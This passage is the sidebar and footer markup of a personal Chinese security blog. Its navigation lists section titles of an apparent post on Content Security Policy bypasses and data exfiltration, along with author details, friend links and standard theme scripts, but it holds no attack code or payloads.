nonce</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8base-url"><span class="nav-number">2.3.1.1.</span> <span class="nav-text">利用base-url</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%8D%E5%AE%8C%E6%95%B4%E7%9A%84script"><span class="nav-number">2.3.1.2.</span> <span class="nav-text">不完整的script</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E7%9A%84dom-xss"><span class="nav-number">2.3.1.3.</span> <span class="nav-text">静态的dom xss</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#script-src-self"><span class="nav-number">2.3.2.</span> <span class="nav-text">script-src:self</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#host-JSONP"><span class="nav-number">2.3.2.1.</span> <span class="nav-text">host JSONP</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#user-uploaded-files"><span class="nav-number">2.3.2.2.</span> <span class="nav-text">user uploaded files.</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8script-gadgets"><span class="nav-number">2.3.3.</span> <span class="nav-text">利用script gadgets</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%B8%A6%E5%A4%96%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-number">3.</span> <span class="nav-text">数据带外的方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E7%AA%83%E5%8F%96%E7%9A%84%E5%A7%BF%E5%8A%BF"><span class="nav-number">4.</span> <span class="nav-text">数据窃取的姿势</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8css"><span class="nav-number">4.0.1.</span> <span class="nav-text">利用css</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E4%B8%8D%E5%AE%8C%E5%85%A8%E7%9A%84%E6%A0%87%E7%AD%BE"><span class="nav-number">4.0.2.</span> <span class="nav-text">利用不完全的标签</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Wendell"
      src="/avatar.jpg">
  <p class="site-author-name" itemprop="name">Wendell</p>
  <div class="site-description" itemprop="description">Wendell blog</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/W4ndell" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;W4ndell" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.whiskeyjj.com/" title="http:&#x2F;&#x2F;www.whiskeyjj.com&#x2F;" rel="noopener" target="_blank">绝望的肉</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.yang99.top/" title="http:&#x2F;&#x2F;www.yang99.top&#x2F;" rel="noopener" target="_blank">Yang_99</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.fzwjscj.xyz/" title="http:&#x2F;&#x2F;www.fzwjscj.xyz&#x2F;" rel="noopener" target="_blank">fzwjscj</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://cherryc4t.top/" title="http:&#x2F;&#x2F;cherryc4t.top&#x2F;" rel="noopener" target="_blank">cherryc4t</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.7yue.top/" title="http:&#x2F;&#x2F;www.7yue.top&#x2F;" rel="noopener" target="_blank">7yue</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://gh0st.top/" title="http:&#x2F;&#x2F;gh0st.top" rel="noopener" target="_blank">gh0st</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Wendell</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a>
  </div><script color="0,0,0" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.1.0/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
